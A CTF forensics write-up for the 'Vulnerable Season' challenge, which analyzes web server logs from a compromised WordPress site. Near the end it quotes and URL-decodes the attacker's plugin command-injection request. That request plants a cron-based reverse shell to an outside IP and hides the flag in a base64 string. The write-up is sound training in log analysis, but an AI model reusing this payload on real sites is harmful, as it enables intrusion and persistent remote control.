Vulnerable Season
Challenge
- CTF: Hack The Boo 2023 - Practice Official Writeup
- Name: Vulnerable Season
- Category: Forensics
- Difficulty: Very Easy
- Points: 300
- Description: Halloween season is a very busy season for all of us. Especially for web page administrators. Too many Halloween-themed parties to attend, too many plugins to manage. Unfortunately, our admin didn’t update the plugins used by our WordPress site and as a result, we got pwned. Can you help us investigate the incident by analyzing the web server logs?
- Objective: Webserver Log Analysis
Files
Download: forensics_vulnerable_season.zip
Writeup
The challenge contains a single file called access.log
that contains Apache log files from a webserver.
Analyzing the traffic source IP address:
1
2
3
4
5
6
$ cat access.log | awk '{print $1}' | sort | uniq -c | sort -n
16 ::1
94 192.168.25.154
148 68.124.212.176
456 192.168.25.1
11020 82.179.92.206
Since most of the traffic is centered around 82.179.92.206, that potentially might be the attackers IP.
Analyzing the user agent of each request:
1
2
3
cat access.log | grep 82.179.92.206 | awk -F\" '{print $6}' | sort | uniq -c | sort -n
84 Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
10936 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
The attacker used two unique User Agents for the requests. Filtering out on the least amount of user-agent traffic (the other potentially could be from scanning), we find an encoded payload:
1
2
cat access.log | grep 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' | tail -n 1
82.179.92.206 - - [28/Sep/2023:05:21:22 -0400] "GET /wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo%20%22sh%20-i%20%3E&%20/dev/tcp/82.179.92.206/7331%200%3E&1%22%20%3E%20/etc/cron.daily/testconnect%20&&%20Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo%20$Mz$Tz$Vz$az$Kz$Oz|base64%20-d|rev:NULL:NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
URL Decoding:
1
/wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo "sh -i >& /dev/tcp/82.179.92.206/7331 0>&1" > /etc/cron.daily/testconnect && Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
Running the commands:
1
2
Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
HTB{L0g_@n4ly5t_4_bEg1nN3r}
Flag:
1
HTB{L0g_@n4ly5t_4_bEg1nN3r}
This post is licensed under CC BY 4.0 by the author.